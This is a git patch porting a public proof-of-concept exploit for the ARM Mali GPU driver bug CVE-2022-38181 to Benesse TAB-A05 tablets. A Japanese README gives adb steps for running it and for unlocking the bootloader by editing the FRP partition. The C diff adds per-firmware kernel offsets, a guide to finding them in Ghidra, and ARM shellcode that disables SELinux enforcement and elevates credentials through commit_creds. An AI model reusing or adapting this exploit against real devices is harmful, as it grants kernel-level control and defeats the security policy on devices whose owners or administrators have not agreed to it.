From b3e89303ea9b6e4350b4734bd52599d1a4788a48 Mon Sep 17 00:00:00 2001 From: Syuugo Date: Tue, 14 May 2024 14:19:03 +0900 Subject: [PATCH] =?UTF-8?q?Neo=20/=20Next=20=E3=81=AB=E5=AF=BE=E5=BF=9C?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: yuu <46545607+mouseos@users.noreply.github.com> Signed-off-by: Syuugo Co-authored-by: yuu <46545607+mouseos@users.noreply.github.com> --- README.md | 137 +++++++-- mali_shrinker_mmap32.c | 643 ++++++++++++++++++----------------------- midgard.h | 18 +- 3 files changed, 406 insertions(+), 392 deletions(-) diff --git a/README.md b/README.md index d11372a..584011e 100644 --- a/README.md +++ b/README.md @@ -1,32 +1,127 @@ -## Exploit for CVE-2022-38181 for FireTV 2nd gen Cube +## Exploit for CVE-2022-38181 for TAB-A05-BD(CTX) and TAB-A05-BA1(CTZ) -This is a fork of security researcher Man Yue Mo's [Pixel 6 POC](https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2022_38181) for CVE-2022-38181. Read his detailed write-up of the vulnerability [here](https://github.blog/2023-01-23-pwning-the-all-google-phone-with-a-non-google-bug/). Changes have been made to account for FireOS's 32bit userspace, as well as the 2nd gen Cube's older Bifrost drivers (r16p0) and Linux kernel (4.9.113) versions. The POC exploits a bug in the ARM Mali kernel driver to gain arbitrary kernel code execution, which is then used to disable SELinux and gain root. +これは、**TAB-A05-BD** 及び **TAB-A05-BA1** 専用の SELinux の状態を **`Permissive`** にするためのエクスプロイトです。 + +## 使用方法 + +> [!NOTE] +> まず、大前提として、ADB が使用可能である必要が有ります。 +> 開発者向けオプションが塞がれている場合、[**DchaStateChanger**](https://github.com/SmileTabLabo/DchaStateChanger) や [**NovaDirectInstaller**](https://github.com/s1204IT/NovaDirectInstaller) を使用してください。 -I used the following command to compile with clang in ndk-21: ``` -android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi30-clang -DSHELL mali_shrinker_mmap32.c -o raven_shrinker +adb push shrinker /data/local/tmp +adb shell chmod +x /data/local/tmp/shrinker +adb shell /data/local/tmp/shrinker ``` -The exploit should be run 30-90sec after the Cube boots for greatest reliability. + +> [!IMPORTANT] +> `shrinker` を実行して一回目で成功できるとは限りません。 +> 途中でクラッシュしたり、無効な引数があると返される場合があります。 +> 残念ながら仕様なので、根気強く何度も挑戦して下さい。 + +一番最後に **`result 49`** と返ってきたら、 ``` -raven:/ $ /data/local/tmp/raven_shrinker -fingerprint: Amazon/raven/raven:9/PS7624.3337N/0026810845440:user/amz-p,release-keys -failed, retry. -failed, retry. -failed, retry. +adb shell getenforce +``` +これを実行して、**`Permissive`** と返って来る事を確認して下さい。 +エクスプロイトの実行は成功です。 + +
TAB-A05-BD 01.11.000 での実行コード + +``` +TAB-A05-BD:/ $ /data/local/tmp/shrinker +fingerprint: benesse/TAB-A05-BD/TAB-A05-BD:9/01.11.000/01.11.000:user/release-keys failed, retry. -region freed 80 -alias gpu va 100c85000 +region freed 56 +alias gpu va 100642000 read 0 cleanup flush region release_mem_pool +reserve pages here jit_freed -jit_free commit: 2 0 -Found freed_idx 2 -Found pgd 23, 100cce000 -overwrite addr : 104100634 634 -overwrite addr : 104300634 634 -overwrite addr : 1041001c4 1c4 -overwrite addr : 1043001c4 1c4 -result 50 -raven:/ # +jit_free commit: 0 0 +Found freed_idx 0 +find_pgd, freed_idx is 0 start_pg is 0 +find_pgd, freed_idx is 0 start_pg is 0 +Found pgd 23, 100659000 +write_data overwrite addr : 1041009bc 9bc +write_data overwrite addr : 1043009bc 9bc +write_func called with code_size = 8 +write_func overwrite addr : 104100d48 d48 +write_func overwrite addr : 104300d48 d48 +time to run_enforce +run_enforce: before sleep +run_enforce: after sleep +run_enforce: open +result 48 +run_enforce_un: before sleep +run_enforce_un: after sleep +run_enforce_un: open +run_enforce_un: after read +run_enforce_un: after close +result 49 +TAB-A05-BD:/ $ getenforce +Permissive +``` +
+ +> [!TIP] +> ブートローダーアンロックは別の処理が必要となるので、次項を参照してください。 + +## ブートローダーアンロック + + +> [!IMPORTANT] +> SELinux が **`Permissive`** の状態の端末を使用してください。 + +始めに、[**DchaServiceTester**](https://github.com/s1204IT/DchaServiceTester/releases/latest) をインストールしてください。 +インストールが終わり次第、アプリを起動し、**`copyUpdateImage`** を選択して下さい。 + +「ファイルのコピー元フルパス」を **`/dev/block/by-name/ftp`** 、「ファイルのコピー先フルパス」を **`/sdcard/frp.bin`** にして実行します。 +正しく実行していれば、`true` と返ってくるはずです。 + +PC に移り、 ``` +adb pull /sdcard/frp.bin +``` +この様に実行し、`frp.bin` を抽出します。 + +抽出したら、[HexEd.it](https://hexed.it/ "HexEd.it - Browser-based Online and Offline Hex Editing") を開き、左上の「ファイルを開く」から、先程抽出した`frp.bin`を選択します。 + +**一番最後の部分**を、`00` から **`01`** に書き換え、保存します。 +[![](https://github.com/SmileTabLabo/CVE-2022-38181/assets/52069677/a7627e2f-7b33-48fd-a0e6-59d637197352)](#) + +保存出来次第、 +``` +adb push frp.bin /sdcard/frp.bin +``` +この様に実行し、端末側に送ります。 + +もう一度、**DchaServiceTester** を開き、次は コピー元 と コピー先 を逆にして実行します。 +先程と同様に、正しく実行していれば、`true` と返ってくるはずです。 + +FRP の書き換えが出来たら、 +``` +adb reboot bootloader +``` +これを実行し、fastboot モードに入ります。 + +``` +fastboot flashing unlock +``` +これを実行し、端末側で 音量+ ボタンを押します。 +5秒程度でアンロックが完了します。 + +> [!TIP] +> この時点で、修正済み `factory.img` をフラッシュする事を強くお勧めします。 + +``` +fastboot reboot +``` +これを実行し、端末を再起動したら、自動的に初期化が始まります。 + +これでブートローダーアンロックは完了です! + +## Thanks +- [@Baiker000](https://github.com/Baiker000) + diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c index 48fe5d5..ecead8e 100644 --- a/mali_shrinker_mmap32.c +++ b/mali_shrinker_mmap32.c @@ -22,9 +22,9 @@ #include #define LOG(fmt, ...) __android_log_print(ANDROID_LOG_ERROR, "exploit", fmt, ##__VA_ARGS__) -#endif //SHELL +#endif // SHELL -#define MALI "/dev/mali0" //check, may be different on other devices +#define MALI "/dev/mali0" #define PAGE_SHIFT 12 @@ -34,13 +34,13 @@ #define SPRAY_PAGES 25 -#define SPRAY_NUM 128 +#define SPRAY_NUM 64 -#define FLUSH_SIZE (0x1000 * 0x180) //increasing = less 'out of memory' results but more crashes (default 0x1000 * 0x100) +#define FLUSH_SIZE (0x1000 * 0x1000) // increasing = less 'out of memory' results but more crashes (default 0x1000 * 0x100) #define SPRAY_CPU 0 -#define POOL_SIZE 16384 //may be different on other devices +#define POOL_SIZE 16384 #define RESERVED_SIZE 32 @@ -50,7 +50,7 @@ #define NUM_TRIALS 100 -#define KERNEL_BASE 0x1080000 //raven's kernel load address +#define KERNEL_BASE 0x40080000 #define OVERWRITE_INDEX 256 @@ -62,204 +62,136 @@ #define ADD_COMMIT_INDEX 3 -//offset values from Cube kallsyms, subtract head t _head -// PS7212/1333 -#define SELINUX_ENFORCING_7212_1333 0x184d634 -#define SEL_READ_HANDLE_UNKNOWN_7212_1333 0x364304 -#define INIT_CRED_7212_1333 0x15eb228 -#define COMMIT_CREDS_7212_1333 0x4ccc0 -#define ADD_INIT_7212_1333 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7212_1333 0x91330108 //add x8, x8, #0xcc0 - -// PS7216/1582 (uncofirmed) -#define SELINUX_ENFORCING_7216_1582 0x184d634 -#define SEL_READ_HANDLE_UNKNOWN_7216_1582 0x364304 -#define INIT_CRED_7216_1582 0x15eb228 -#define COMMIT_CREDS_7216_1582 0x4ccc0 -#define ADD_INIT_7216_1582 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7216_1582 0x91330108 //add x8, x8, #0xcc0 - -// PS7224/1752 (uncofirmed) -#define SELINUX_ENFORCING_7224_1752 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7224_1752 0x3641bc -#define INIT_CRED_7224_1752 0x15fb228 -#define COMMIT_CREDS_7224_1752 0x4ccc0 -#define ADD_INIT_7224_1752 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7224_1752 0x91330108 //add x8, x8, #0xcc0 - -// PS7229/1853 -#define SELINUX_ENFORCING_7229_1853 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7229_1853 0x3641bc -#define INIT_CRED_7229_1853 0x15fb228 -#define COMMIT_CREDS_7229_1853 0x4ccc0 -#define ADD_INIT_7229_1853 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7229_1853 0x91330108 //add x8, x8, #0xcc0 - -// PS7229/1856 -#define SELINUX_ENFORCING_7229_1856 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7229_1856 0x3641bc -#define INIT_CRED_7229_1856 0x15fb228 -#define COMMIT_CREDS_7229_1856 0x4ccc0 -#define ADD_INIT_7229_1856 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7229_1856 0x91330108 //add x8, x8, #0xcc0 - -// PS7234/2039 (unconfirmed) -#define SELINUX_ENFORCING_7234_2039 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7234_2039 0x36383c -#define INIT_CRED_7234_2039 0x15fb228 -#define COMMIT_CREDS_7234_2039 0x4ccc0 -#define ADD_INIT_7234_2039 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7234_2039 0x91330108 //add x8, x8, #0xcc0 - -// PS7234/2042 (unconfirmed) -#define SELINUX_ENFORCING_7234_2042 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7234_2042 0x36383c -#define INIT_CRED_7234_2042 0x15fb228 -#define COMMIT_CREDS_7234_2042 0x4ccc0 -#define ADD_INIT_7234_2042 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7234_2042 0x91330108 //add x8, x8, #0xcc0 - -// PS7242/2216 -#define SELINUX_ENFORCING_7242_2216 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7242_2216 0x3641ec -#define INIT_CRED_7242_2216 0x15fb228 -#define COMMIT_CREDS_7242_2216 0x4ccc0 -#define ADD_INIT_7242_2216 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7242_2216 0x91330108 //add x8, x8, #0xcc0 - -// PS7242/2896 (unconfirmed) -#define SELINUX_ENFORCING_7242_2896 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7242_2896 0x364158 -#define INIT_CRED_7242_2896 0x15fb228 -#define COMMIT_CREDS_7242_2896 0x4ccc0 -#define ADD_INIT_7242_2896 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7242_2896 0x91330108 //add x8, x8, #0xcc0 - -// PS7242/2906 -#define SELINUX_ENFORCING_7242_2906 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7242_2906 0x364158 -#define INIT_CRED_7242_2906 0x15fb228 -#define COMMIT_CREDS_7242_2906 0x4ccc0 -#define ADD_INIT_7242_2906 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7242_2906 0x91330108 //add x8, x8, #0xcc0 - -// PS7242/3515 -#define SELINUX_ENFORCING_7242_3515 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7242_3515 0x364158 -#define INIT_CRED_7242_3515 0x15fb228 -#define COMMIT_CREDS_7242_3515 0x4ccc0 -#define ADD_INIT_7242_3515 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7242_3515 0x91330108 //add x8, x8, #0xcc0 - -// PS7242/3516 -#define SELINUX_ENFORCING_7242_3516 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7242_3516 0x364158 -#define INIT_CRED_7242_3516 0x15fb228 -#define COMMIT_CREDS_7242_3516 0x4ccc0 -#define ADD_INIT_7242_3516 0x9108a000 //add x0, x0, #0x228 -#define ADD_COMMIT_7242_3516 0x91330108 //add x8, x8, #0xcc0 - -// PS7273/2625 -#define SELINUX_ENFORCING_7273_2625 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7273_2625 0x364158 -#define INIT_CRED_7273_2625 0x15fb528 -#define COMMIT_CREDS_7273_2625 0x4ccc0 -#define ADD_INIT_7273_2625 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7273_2625 0x91330108 //add x8, x8, #0xcc0 - -// PS7279/2766 -#define SELINUX_ENFORCING_7279_2766 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7279_2766 0x364158 -#define INIT_CRED_7279_2766 0x15fb528 -#define COMMIT_CREDS_7279_2766 0x4ccc0 -#define ADD_INIT_7279_2766 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7279_2766 0x91330108 //add x8, x8, #0xcc0 - -// PS7285/2877 -#define SELINUX_ENFORCING_7285_2877 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7285_2877 0x364158 -#define INIT_CRED_7285_2877 0x15fb528 -#define COMMIT_CREDS_7285_2877 0x4ccc0 -#define ADD_INIT_7285_2877 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7285_2877 0x91330108 //add x8, x8, #0xcc0 - -// PS7285/2880 -#define SELINUX_ENFORCING_7285_2880 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7285_2880 0x364158 -#define INIT_CRED_7285_2880 0x15fb528 -#define COMMIT_CREDS_7285_2880 0x4ccc0 -#define ADD_INIT_7285_2880 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7285_2880 0x91330108 //add x8, x8, #0xcc0 - -// PS7292/2982 -#define SELINUX_ENFORCING_7292_2982 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7292_2982 0x3641d4 -#define INIT_CRED_7292_2982 0x15fb528 -#define COMMIT_CREDS_7292_2982 0x4ccc0 -#define ADD_INIT_7292_2982 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7292_2982 0x91330108 //add x8, x8, #0xcc0 - -// PS7292/2984 -#define SELINUX_ENFORCING_7292_2984 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7292_2984 0x3641d4 -#define INIT_CRED_7292_2984 0x15fb528 -#define COMMIT_CREDS_7292_2984 0x4ccc0 -#define ADD_INIT_7292_2984 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7292_2984 0x91330108 //add x8, x8, #0xcc0 - -// PS7603/3110 -#define SELINUX_ENFORCING_7603_3110 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7603_3110 0x3641d4 -#define INIT_CRED_7603_3110 0x15fb528 -#define COMMIT_CREDS_7603_3110 0x4ccc0 -#define ADD_INIT_7603_3110 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7603_3110 0x91330108 //add x8, x8, #0xcc0 - -// PS7608/3614 -#define SELINUX_ENFORCING_7608_3614 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7608_3614 0x3641d4 -#define INIT_CRED_7608_3614 0x15fb528 -#define COMMIT_CREDS_7608_3614 0x4ccc0 -#define ADD_INIT_7608_3614 0x9114a000 //add x0, x0, #0x528 -#define ADD_COMMIT_7608_3614 0x91330108 //add x8, x8, #0xcc0 - -// PS7614/3227 -#define SELINUX_ENFORCING_7614_3227 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7614_3227 0x3641c4 -#define INIT_CRED_7614_3227 0x15fb568 -#define COMMIT_CREDS_7614_3227 0x4ccb0 -#define ADD_INIT_7614_3227 0x9115a000 //add x0, x0, #0x568 -#define ADD_COMMIT_7614_3227 0x9132c108 //add x8, x8, #0xcb0 - -// PS7624/3337 -#define SELINUX_ENFORCING_7624_3337 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7624_3337 0x3641c4 -#define INIT_CRED_7624_3337 0x15fb568 -#define COMMIT_CREDS_7624_3337 0x4ccb0 -#define ADD_INIT_7624_3337 0x9115a000 //add x0, x0, #0x568 -#define ADD_COMMIT_7624_3337 0x9132c108 //add x8, x8, #0xcb0 - -// PS7633/3445 -#define SELINUX_ENFORCING_7633_3445 0x185d634 -#define SEL_READ_HANDLE_UNKNOWN_7633_3445 0x3641d0 -#define INIT_CRED_7633_3445 0x15fb568 -#define COMMIT_CREDS_7633_3445 0x4ccb0 -#define ADD_INIT_7633_3445 0x9115a000 //add x0, x0, #0x568 -#define ADD_COMMIT_7633_3445 0x9132c108 //add x8, x8, #0xcb0 - - -static uint64_t sel_read_handle_unknown = SEL_READ_HANDLE_UNKNOWN_7624_3337; - -static uint64_t selinux_enforcing = SELINUX_ENFORCING_7624_3337; /* -Overwriting SELinux to permissive +KERNEL_BASE = do_undefinstr - 0x1000 +COMMIT_CREDS = commit_creds - KERNEL_BASE +AVC_DENY= avc_denied.isra.4 - KERNEL_BASE +SEL_READ_ENFORCE = sel_read_enforce - KERNEL_BASE +SEL_READ_HANDLE_UNKNOWN = sel_read_handle_unknown - KERNEL_BASE + +Need: Ghidra +Search: prepare_kernel_cred -> +INIT_CRED = mov - KERNEL_BASE +Search: sel_read_enforce -> +SELINUX_ENFORCING = ldr - KERNEL_BASE + +Need: ARM to HEX +ADD_COMMIT = add x8, x8, #0x(Last 3 digits of INIT_CRED) +ADD_INIT = add x0, x0, #0x(Last 3 digits of INIT_CRED) +*/ + +// TAB-A05-BD 01.00.000 +#define SELINUX_ENFORCING_CTX_01_00_000 0x129d9bc +#define SEL_READ_HANDLE_UNKNOWN_CTX_01_00_000 0x365d80 // 0xffffff80083e5d80 - 0xffffff8008080000 = 0x365d80 +#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8 // 0xffffff80083e53a8 - 0xffffff8008080000 = 0x3653A8 //add +#define INIT_CRED_CTX_01_00_000 0x11553f0 // 0xffffff80091d53f0 - 0xffffff8008080000 = 0x11553F0 +#define COMMIT_CREDS_CTX_01_00_000 0x5a120 // 0xffffff80080da120 - 0xffffff8008080000 = 0x5a120 +#define ADD_INIT_CTX_01_00_000 0x910fc000 +#define ADD_COMMIT_CTX_01_00_000 0x91048108 +#define AVC_DENY_CTX_01_00_000 0x35acc8 // 0xffffff80083dacc8 - 0xffffff8008080000 = 0x35ACC8;//add + +/* + * Maintained by Syuugo + */ + +// TAB-A05-BD 01.01.001 +#define COMMIT_CREDS_CTX_01_01_001 0x5a120 +#define AVC_DENY_CTX_01_01_001 0x35acc8 +#define SEL_READ_ENFORCE_CTX_01_01_001 0x365418 +#define SEL_READ_HANDLE_UNKNOWN_CTX_01_01_001 0x365df0 +#define INIT_CRED_CTX_01_01_001 0x11653f0 +#define SELINUX_ENFORCING_CTX_01_01_001 0x12ad9bc +#define ADD_INIT_CTX_01_01_001 0x910fc000 +#define ADD_COMMIT_CTX_01_01_001 0x91048108 + +// TAB-A05-BD 01.04.000 +#define COMMIT_CREDS_CTX_01_04_000 0x5a120 +#define AVC_DENY_CTX_01_04_000 0x35ac10 +#define SEL_READ_ENFORCE_CTX_01_04_000 0x365360 +#define SEL_READ_HANDLE_UNKNOWN_CTX_01_04_000 0x365d38 +#define INIT_CRED_CTX_01_04_000 0x11653f0 +#define SELINUX_ENFORCING_CTX_01_04_000 0x12ae9bc +#define ADD_INIT_CTX_01_04_000 0x910fc000 +#define ADD_COMMIT_CTX_01_04_000 0x91048108 + +// TAB-A05-BD 01.11.000 +#define COMMIT_CREDS_CTX_01_11_000 0x5a120 +#define AVC_DENY_CTX_01_11_000 0x359c20 +#define SEL_READ_ENFORCE_CTX_01_11_000 0x364370 +#define SEL_READ_HANDLE_UNKNOWN_CTX_01_11_000 0x364d48 +#define INIT_CRED_CTX_01_11_000 0x11653f0 +#define SELINUX_ENFORCING_CTX_01_11_000 0x12ae9bc +#define ADD_INIT_CTX_01_11_000 0x910fc000 +#define ADD_COMMIT_CTX_01_11_000 0x91048108 + +// TAB-A05-BA1 01.00.000 +#define COMMIT_CREDS_CTZ_01_00_000 0x5a120 +#define AVC_DENY_CTZ_01_00_000 0x359c20 +#define SEL_READ_ENFORCE_CTZ_01_00_000 0x364370 +#define SEL_READ_HANDLE_UNKNOWN_CTZ_01_00_000 0x364d48 +#define INIT_CRED_CTZ_01_00_000 0x11653f0 +#define SELINUX_ENFORCING_CTZ_01_00_000 0x12d49bc +#define ADD_INIT_CTZ_01_00_000 0x910fc000 +#define ADD_COMMIT_CTZ_01_00_000 0x91048108 + +// TAB-A05-BA1 01.01.000 +#define COMMIT_CREDS_CTZ_01_01_000 0x5a120 +#define AVC_DENY_CTZ_01_01_000 0x359a68 +#define SEL_READ_ENFORCE_CTZ_01_01_000 0x3641b8 +#define SEL_READ_HANDLE_UNKNOWN_CTZ_01_01_000 0x364b90 +#define INIT_CRED_CTZ_01_01_000 0x11653f0 +#define SELINUX_ENFORCING_CTZ_01_01_000 0x12d49bc +#define ADD_INIT_CTZ_01_01_000 0x910fc000 +#define ADD_COMMIT_CTZ_01_01_000 0x91048108 + +// TAB-A05-BA1 01.02.004 +#define COMMIT_CREDS_CTZ_01_02_004 0x5a120 +#define AVC_DENY_CTZ_01_02_004 0x35bad0 +#define SEL_READ_ENFORCE_CTZ_01_02_004 0x366190 +#define SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_004 0x366b68 +#define INIT_CRED_CTZ_01_02_004 0x11a53f0 +#define SELINUX_ENFORCING_CTZ_01_02_004 0x13199bc +#define ADD_INIT_CTZ_01_02_004 0x910fc000 +#define ADD_COMMIT_CTZ_01_02_004 0x91048108 + +// TAB-A05-BA1 01.02.005 +#define COMMIT_CREDS_CTZ_01_02_005 0x5a120 +#define AVC_DENY_CTZ_01_02_005 0x35bad0 +#define SEL_READ_ENFORCE_CTZ_01_02_005 0x366190 +#define SEL_READ_HANDLE_UNKNOWN_CTZ_01_02_005 0x366b68 +#define INIT_CRED_CTZ_01_02_005 0x11a53f0 +#define SELINUX_ENFORCING_CTZ_01_02_005 0x13199bc +#define ADD_INIT_CTZ_01_02_005 0x910fc000 +#define ADD_COMMIT_CTZ_01_02_005 0x91048108 + +// TAB-A05-BA1 01.03.000 +#define COMMIT_CREDS_CTZ_01_03_000 0x5a120 +#define AVC_DENY_CTZ_01_03_000 0x35bad0 +#define SEL_READ_ENFORCE_CTZ_01_03_000 0x366190 +#define SEL_READ_HANDLE_UNKNOWN_CTZ_01_03_000 0x366b68 +#define INIT_CRED_CTZ_01_03_000 0x11a53f0 +#define SELINUX_ENFORCING_CTZ_01_03_000 0x13199bc +#define ADD_INIT_CTZ_01_03_000 0x910fc000 +#define ADD_COMMIT_CTZ_01_03_000 0x91048108 + +static uint64_t sel_read_handle_unknown; + +static uint64_t selinux_enforcing; + +//static uint64_t avc_deny = 0x2CCC28; +static uint64_t avc_deny; +static uint64_t selinux_enforcing_READ = 0X0; +static uint64_t selinux_enforcing_WRITE = 0X0; +/* + Overwriting SELinux to permissive strb wzr, [x0] mov x0, #0 ret */ -//static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; +static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; static uint32_t root_code[8] = {0}; +static uint32_t root_code_un[8] = {0}; static uint8_t jit_id = 1; static uint8_t atom_number = 1; @@ -272,15 +204,15 @@ static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE]; struct base_mem_handle { - struct { - __u64 handle; - } basep; + struct { + __u64 handle; + } basep; }; struct base_mem_aliasing_info { - struct base_mem_handle handle; - __u64 offset; - __u64 length; + struct base_mem_handle handle; + __u64 offset; + __u64 length; }; static int open_dev(char* name) { @@ -296,7 +228,7 @@ void setup_mali(int fd, int group_id) { if (ioctl(fd, KBASE_IOCTL_VERSION_CHECK, ¶m) < 0) { err(1, "version check failed\n"); } - //struct kbase_ioctl_set_flags set_flags = {group_id << 3}; + // struct kbase_ioctl_set_flags set_flags = {group_id << 3}; struct kbase_ioctl_set_flags set_flags = {0}; if (ioctl(fd, KBASE_IOCTL_SET_FLAGS, &set_flags) < 0) { err(1, "set flags failed\n"); @@ -347,7 +279,7 @@ uint64_t jit_allocate(int fd, uint8_t atom_number, uint8_t id, uint64_t va_pages if (ioctl(fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { err(1, "submit job failed\n"); } - return *((uint64_t*)gpu_alloc_region); + return *((uint64_t*)gpu_alloc_region); } void jit_free(int fd, uint8_t atom_number, uint8_t id) { @@ -507,7 +439,7 @@ void reserve_pages(int mali_fd, int pages, int nents, uint64_t* reserved_va) { alloc.in.flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD | BASE_MEM_PROT_CPU_WR | BASE_MEM_PROT_GPU_WR; // | (1 << 22); int prot = PROT_READ | PROT_WRITE; alloc.in.va_pages = pages; - alloc.in.commit_pages = pages; //alloc.in.commit_pages = 0; + alloc.in.commit_pages = pages; // alloc.in.commit_pages = 0; mem_alloc(mali_fd, &alloc); reserved_va[i] = alloc.out.gpu_va; } @@ -536,7 +468,7 @@ uint64_t alias_sprayed_regions(int mali_fd) { printf("alias gpu va %llx\n", alias.out.gpu_va); /* uint64_t region_size = 0x1000 * SPRAY_NUM * SPRAY_PAGES; - void* region = mmap64(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va); + void* region = mmap(NULL, region_size, PROT_READ, MAP_SHARED, mali_fd, alias.out.gpu_va); if (region == MAP_FAILED) { err(1, "mmap alias failed"); } @@ -549,7 +481,7 @@ uint64_t alias_sprayed_regions(int mali_fd) { } alias_regions[i] = this_region; } - // return (uint64_t)(alias_regions[0]); + //return (uint64_t)(alias_regions[0]); return (uint64_t)alias.out.gpu_va; } @@ -580,7 +512,9 @@ int find_freed_idx(int mali_fd) { } int find_pgd(int freed_idx, int start_pg) { + printf("find_pgd, freed_idx is %d start_pg is %d \n",freed_idx, start_pg); uint64_t* this_alias = alias_regions[freed_idx]; + printf("find_pgd, freed_idx is %d start_pg is %d \n",freed_idx, start_pg); for (int pg = start_pg; pg < SPRAY_PAGES; pg++) { for (int i = 0; i < 0x1000/8; i++) { uint64_t entry = this_alias[pg * 0x1000/8 + i]; @@ -609,20 +543,20 @@ uint32_t write_adrp(int rd, uint64_t pc, uint64_t label) { int32_t immlo = (offset >> 12) & 0x3; uint32_t adpr = rd & 0x1f; adpr |= (1 << 28); - adpr |= (1 << 31); //op + adpr |= (1 << 31); // op adpr |= immlo << 29; adpr |= (immhi_mask & (immhi << 5)); return adpr; } -void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_handle_unknown, uint32_t add_init, uint32_t add_commit) { +void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_enforce, uint32_t add_init, uint32_t add_commit) { - uint32_t init_adpr = write_adrp(0, read_handle_unknown, init_cred); - //Sets x0 to init_cred + uint32_t init_adpr = write_adrp(0, read_enforce, init_cred); + // Sets x0 to init_cred root_code[ADRP_INIT_INDEX] = init_adpr; root_code[ADD_INIT_INDEX] = add_init; - //Sets x8 to commit_creds - root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_handle_unknown, commit_cred); + // Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = write_adrp(8, read_enforce, commit_cred); root_code[ADD_COMMIT_INDEX] = add_commit; root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] root_code[5] = 0xd63f0100; // blr x8 @@ -630,6 +564,36 @@ void fixup_root_shell(uint64_t init_cred, uint64_t commit_cred, uint64_t read_ha root_code[7] = 0xd65f03c0; // ret } +void fixup_root_shell_nop() { + + // Sets x0 to init_cred + root_code[ADRP_INIT_INDEX] = 0xD503201F; + root_code[ADD_INIT_INDEX] = 0xD503201F; + // Sets x8 to commit_creds + root_code[ADRP_COMMIT_INDEX] = 0xD503201F; + root_code[ADD_COMMIT_INDEX] = 0xD503201F; + root_code[4] = 0xD503201F; // stp x29, x30, [sp, #-0x10] + root_code[5] = 0xD503201F; // blr x8 + root_code[6] = 0xD503201F; // ldp x29, x30, [sp], #0x10 + root_code[7] = 0xD503201F; // ret +} + +void fixup_root_shell_un(uint64_t init_cred, uint64_t commit_cred, uint64_t read_handle_unknown, uint32_t add_init, uint32_t add_commit) { + + uint32_t init_adpr = write_adrp(0, read_handle_unknown, init_cred); + // Sets x0 to init_cred + root_code_un[ADRP_INIT_INDEX] = init_adpr; + root_code_un[ADD_INIT_INDEX] = add_init; + // Sets x8 to commit_creds + root_code_un[ADRP_COMMIT_INDEX] = write_adrp(8, read_handle_unknown, commit_cred); + root_code_un[ADD_COMMIT_INDEX] = add_commit; + root_code_un[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code_un[5] = 0xd63f0100; // blr x8 + root_code_un[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code_un[7] = 0xd65f03c0; // ret +} + + uint64_t set_addr_lv3(uint64_t addr) { uint64_t pfn = addr >> PAGE_SHIFT; pfn &= ~ 0x1FFUL; @@ -672,7 +636,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e if (ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &submit) < 0) { err(1, "submit job failed\n"); } - usleep(10000); + usleep(500000); } void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, uint64_t value, enum mali_write_value_type type) { @@ -686,7 +650,7 @@ void write_data(int mali_fd, uint64_t data, uint64_t* reserved, uint64_t size, u for (uint64_t addr = base; addr < end; addr += 0x1000) { uint64_t overwrite_addr = set_addr_lv3(addr); if (curr_overwrite_addr != overwrite_addr) { - LOG("overwrite addr : %llx %llx\n", overwrite_addr + data_offset, data_offset); + LOG("write_data overwrite addr : %llx %llx\n", 